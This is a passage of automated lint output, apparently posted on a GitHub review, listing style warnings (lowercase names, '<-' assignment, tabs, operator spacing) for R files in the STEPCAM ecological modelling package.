lowercase.**\n```r\n​        nextDisp[numberAccepted] = params[1]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:209:34:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L209) *style:* **Use <-, not =, for assignment.**\n```r\n​        nextDisp[numberAccepted] = params[1]\n                                 ^\n```\n[R/ABC_SMC.R:210:9:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextFilt[numberAccepted] = params[2]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:210:18:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L210) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextFilt[numberAccepted] = params[2]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:210:34:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L210) *style:* **Use <-, not =, for assignment.**\n```r\n​        nextFilt[numberAccepted] = params[2]\n                                 ^\n```\n[R/ABC_SMC.R:211:9:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextComp[numberAccepted] = params[3]\n        ^~~~~~~~\n```\n[R/ABC_SMC.R:211:18:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L211) *style:* **Variable and function names should be all lowercase.**\n```r\n​        nextComp[numberAccepted] = params[3]\n                 ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:211:34:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L211) *style:* **Use <-, not =, for assignment.**\n```r\n​        nextComp[numberAccepted] = params[3]\n                                 ^\n```\n[R/ABC_SMC.R:213:14:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L213) *style:* **Variable and function names should be all lowercase.**\n```r\n​        fits[numberAccepted] = fit\n             ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:213:30:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L213) *style:* **Use <-, not =, for assignment.**\n```r\n​        fits[numberAccepted] = fit\n                             ^\n```\n[R/ABC_SMC.R:214:9:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​        RichVec[numberAccepted] = FRic[[1]]\n        ^~~~~~~\n```\n[R/ABC_SMC.R:214:17:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​        RichVec[numberAccepted] = FRic[[1]]\n                ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:214:33:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L214) *style:* **Use <-, not =, for assignment.**\n```r\n​        RichVec[numberAccepted] = FRic[[1]]\n                                ^\n```\n[R/ABC_SMC.R:215:9:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        EveVec[numberAccepted] = FEve[[1]]\n        ^~~~~~\n```\n[R/ABC_SMC.R:215:16:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L215) *style:* **Variable and function names should be all lowercase.**\n```r\n​        EveVec[numberAccepted] = FEve[[1]]\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:215:32:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L215) *style:* **Use <-, not =, for assignment.**\n```r\n​        EveVec[numberAccepted] = FEve[[1]]\n                               ^\n```\n[R/ABC_SMC.R:216:9:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        DivVec[numberAccepted] = FDiv[[1]]\n        ^~~~~~\n```\n[R/ABC_SMC.R:216:16:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L216) *style:* **Variable and function names should be all lowercase.**\n```r\n​        DivVec[numberAccepted] = FDiv[[1]]\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:216:32:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L216) *style:* **Use <-, not =, for assignment.**\n```r\n​        DivVec[numberAccepted] = FDiv[[1]]\n                               ^\n```\n[R/ABC_SMC.R:217:9:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​        OptVec[numberAccepted] = mean_optimum;\n        ^~~~~~\n```\n[R/ABC_SMC.R:217:16:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L217) *style:* **Variable and function names should be all lowercase.**\n```r\n​        OptVec[numberAccepted] = mean_optimum;\n               ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:217:32:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L217) *style:* **Use <-, not =, for assignment.**\n```r\n​        OptVec[numberAccepted] = mean_optimum;\n                               ^\n```\n[R/ABC_SMC.R:219:11:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L219) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​        if(t == 1) {\n          ^\n```\n[R/ABC_SMC.R:220:11:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L220) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] = 1\n          ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:220:23:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L220) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] = 1\n                      ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:220:39:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L220) *style:* **Use <-, not =, for assignment.**\n```r\n​          nextWeights[numberAccepted] = 1\n                                      ^\n```\n[R/ABC_SMC.R:222:11:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L222) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] =\n          ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:222:23:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L222) *style:* **Variable and function names should be all lowercase.**\n```r\n​          nextWeights[numberAccepted] =\n                      ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:222:39:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L222) *style:* **Use <-, not =, for assignment.**\n```r\n​          nextWeights[numberAccepted] =\n                                      ^\n```\n[R/ABC_SMC.R:223:13:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L223) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n            ^~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:223:53:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L223) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n                                                    ^~~~~~~~\n```\n[R/ABC_SMC.R:223:63:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L223) *style:* **Variable and function names should be all lowercase.**\n```r\n​            calculateWeight(params, changed, sigma, dispVals, filtVals,\n                                                              ^~~~~~~~\n```\n[R/ABC_SMC.R:224:29:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​                            compVals, numParticles, weights)\n                            ^~~~~~~~\n```\n[R/ABC_SMC.R:224:39:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L224) *style:* **Variable and function names should be all lowercase.**\n```r\n​                            compVals, numParticles, weights)\n                                      ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:227:18:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L227) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      if ((numberAccepted)%%(numParticles / PRINT_FREQ) == 0) {\n                 ^\n```\n[R/ABC_SMC.R:227:19:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L227) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      if ((numberAccepted)%%(numParticles / PRINT_FREQ) == 0) {\n                  ^\n```\n[R/ABC_SMC.R:227:20:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L227) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t      if ((numberAccepted)%%(numParticles / PRINT_FREQ) == 0) {\n                   ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:227:35:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L227) *style:* **Put spaces around all infix operators.**\n```r\n​\t      if ((numberAccepted)%%(numParticles / PRINT_FREQ) == 0) {\n                                 ~^~~\n```\n[R/ABC_SMC.R:227:37:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L227) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      if ((numberAccepted)%%(numParticles / PRINT_FREQ) == 0) {\n                                    ^\n```\n[R/ABC_SMC.R:227:38:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L227) *style:* **Variable and function names should be all lowercase.**\n```r\n​\t      if ((numberAccepted)%%(numParticles / PRINT_FREQ) == 0) {\n                                     ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:227:51:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L227) *style:* **Put spaces around all infix operators.**\n```r\n​\t      if ((numberAccepted)%%(numParticles / PRINT_FREQ) == 0) {\n                                                 ~^~\n```\n[R/ABC_SMC.R:227:65:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L227) *style:* **Put spaces around all infix operators.**\n```r\n​\t      if ((numberAccepted)%%(numParticles / PRINT_FREQ) == 0) {\n                                                               ~^~~\n```\n[R/ABC_SMC.R:233:21:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L233) *style:* **Put spaces around all infix operators.**\n```r\n​      if (tried > (1/stopRate) && tried > 5)  {\n                   ~^~\n```\n[R/ABC_SMC.R:233:22:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L233) *style:* **Variable and function names should be all lowercase.**\n```r\n​      if (tried > (1/stopRate) && tried > 5)  {\n                     ^~~~~~~~\n```\n[R/ABC_SMC.R:235:13:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L235) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n            ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:235:38:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L235) *style:* **Variable and function names should be all lowercase.**\n```r\n​        if (numberAccepted / tried < stopRate) {\n                                     ^~~~~~~~\n```\n[R/ABC_SMC.R:242:5:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L242) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- nextDisp\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:242:17:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L242) *style:* **Variable and function names should be all lowercase.**\n```r\n​    dispVals <- nextDisp\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:243:5:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L243) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- nextFilt\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:243:17:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L243) *style:* **Variable and function names should be all lowercase.**\n```r\n​    filtVals <- nextFilt\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:244:5:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L244) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- nextComp\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:244:17:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L244) *style:* **Variable and function names should be all lowercase.**\n```r\n​    compVals <- nextComp\n                ^~~~~~~~\n```\n[R/ABC_SMC.R:245:16:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L245) *style:* **Variable and function names should be all lowercase.**\n```r\n​    weights <- nextWeights\n               ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:247:21:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L247) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                    ^~~~~~~~\n```\n[R/ABC_SMC.R:247:31:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L247) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                              ^~~~~~~~\n```\n[R/ABC_SMC.R:247:41:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L247) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                                        ^~~~~~~~\n```\n[R/ABC_SMC.R:247:51:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L247) *style:* **Variable and function names should be all lowercase.**\n```r\n​    output <- cbind(dispVals, filtVals, compVals, RichVec,\n                                                  ^~~~~~~\n```\n[R/ABC_SMC.R:248:21:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L248) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                    ^~~~~~\n```\n[R/ABC_SMC.R:248:29:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L248) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                            ^~~~~~\n```\n[R/ABC_SMC.R:248:37:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L248) *style:* **Variable and function names should be all lowercase.**\n```r\n​                    EveVec, DivVec, OptVec, fits, weights)\n                                    ^~~~~~\n```\n[R/ABC_SMC.R:249:54:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L249) *style:* **Put spaces around all infix operators.**\n```r\n​    file_name <- paste(\"particles_t=\", t, \".txt\", sep=\"\", collapse = NULL)\n                                                    ~^~\n```\n[R/ABC_SMC.R:252:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L252) *style:* **lines should not be more than 80 characters.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:252:19:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                  ^~~~~~~~\n```\n[R/ABC_SMC.R:252:35:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:252:51:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L252) *style:* **Variable and function names should be all lowercase.**\n```r\n​    cat(\" \", mean(dispVals), mean(filtVals), mean(compVals), \"\\t\", \"accept rate = \",\n                                                  ^~~~~~~~\n```\n[R/ABC_SMC.R:253:9:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L253) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n        ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:253:32:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L253) *style:* **Put spaces around all infix operators.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n                              ~^~\n```\n[R/ABC_SMC.R:253:37:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L253) *style:* **Variable and function names should be all lowercase.**\n```r\n​        numberAccepted / (tried-1), numberAccepted, tried, \"\\n\")\n                                    ^~~~~~~~~~~~~~\n```\n[R/ABC_SMC.R:256:5:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L256) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextWeights <- rep(1,numParticles)\n    ^~~~~~~~~~~\n```\n[R/ABC_SMC.R:256:26:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L256) *style:* **Commas should always have a space after.**\n```r\n​    nextWeights <- rep(1,numParticles)\n                         ^\n```\n[R/ABC_SMC.R:256:26:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L256) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextWeights <- rep(1,numParticles)\n                         ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:257:5:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextDisp <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:257:19:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L257) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextDisp <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:258:5:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L258) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextFilt <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:258:19:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L258) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextFilt <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:259:5:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L259) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextComp <- 1:numParticles\n    ^~~~~~~~\n```\n[R/ABC_SMC.R:259:19:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L259) *style:* **Variable and function names should be all lowercase.**\n```r\n​    nextComp <- 1:numParticles\n                  ^~~~~~~~~~~~\n```\n[R/ABC_SMC.R:266:13:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L266) *style:* **Put spaces around all infix operators.**\n```r\n​\t  d <- read.table(paste(\"particles_t=\", t - 2, \".txt\", sep=\"\",\n           ~^~~\n```\n[R/ABC_SMC.R:266:51:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L266) *style:* **Put spaces around all infix operators.**\n```r\n​\t  d <- read.table(paste(\"particles_t=\", t - 2, \".txt\", sep=\"\",\n                                                 ~^~\n```\n[R/ABC_SMC.R:267:42:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L267) *style:* **Put spaces around all infix operators.**\n```r\n​\t                        collapse = NULL), header = F)\n                                        ~^\n```\n[R/ABC_SMC.R:270:21:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L270) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                   ~^~~\n```\n[R/ABC_SMC.R:270:59:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L270) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  d <- read.table(paste(\"particles_t=\", t - 1, \".txt\", sep=\"\",\n                                                         ~^~\n```\n[R/ABC_SMC.R:271:50:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L271) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t                        collapse = NULL), header = F)\n                                                ~^\n```\n[R/ABC_SMC.R:273:21:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L273) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t  d <- read.table(paste(\"particles_t=\", t, \".txt\", sep=\"\",\n                   ~^~~\n```\n[R/ABC_SMC.R:274:50:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/ABC_SMC.R#L274) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t                        collapse = NULL), header = F)\n                                                ~^\n```\n[R/generateArtificialData.R:3:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/generateArtificialData.R#L3) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[R/generateArtificialData.R:4:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/generateArtificialData.R#L4) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​generate.Artificial.Data <- function(numSpecies, numTraits, numCommunities,\n^~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:4:38:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/generateArtificialData.R#L4) *style:* **Variable and function names should be all lowercase.**\n```r\n​generate.Artificial.Data <- function(numSpecies, numTraits, numCommunities,\n                                     ^~~~~~~~~~\n```\n[R/generateArtificialData.R:4:50:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/generateArtificialData.R#L4) *style:* **Variable and function names should be all lowercase.**\n```r\n​generate.Artificial.Data <- function(numSpecies, numTraits, numCommunities,\n                                                 ^~~~~~~~~\n```\n[R/generateArtificialData.R:4:61:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/generateArtificialData.R#L4) *style:* **Variable and function names should be all lowercase.**\n```r\n​generate.Artificial.Data <- function(numSpecies, numTraits, numCommunities,\n                                                            ^~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:5:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/generateArtificialData.R#L5) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tpool_richness <- numSpecies\n^\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/generateArtificialData.R#L6) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tn_traits <- numTraits;\n^\n```\n[R/generateArtificialData.R:6:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/generateArtificialData.R#L6) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\n^\n```\n[R/generateArtificialData.R:7:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/generateArtificialData.R#L7) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tn_communities <- numCommunities\n^\n```\n[R/generateArtificialData.R:8:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tmechanism_random <- random.Mechanism;\t\n^\n```\n[R/generateArtificialData.R:8:23:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/generateArtificialData.R#L8) *style:* **Put spaces around all infix operators.**\n```r\n​\tpool_richness <- numSpecies\n                     ~^~~\n```\n[R/generateArtificialData.R:8:26:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/generateArtificialData.R#L8) *style:* **Variable and function names should be all lowercase.**\n```r\n​\tpool_richness <- numSpecies\n                         ^~~~~~~~~~\n```\n[R/generateArtificialData.R:8:39:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/generateArtificialData.R#L8) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tmechanism_random <- random.Mechanism;\t\n                                      ^\n```\n[R/generateArtificialData.R:9:1:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/generateArtificialData.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\n^\n```\n[R/generateArtificialData.R:9:18:](https://github.com/thijsjanzen/STEPCAM/blob/9a98bebbd29e83695001db6fb6946d85cc3ea609/R/generateArtificialData.R#L9) *style:* **Put spaces around all infix operators.**\n```r\n​\tn_traits <- numTraits;\n                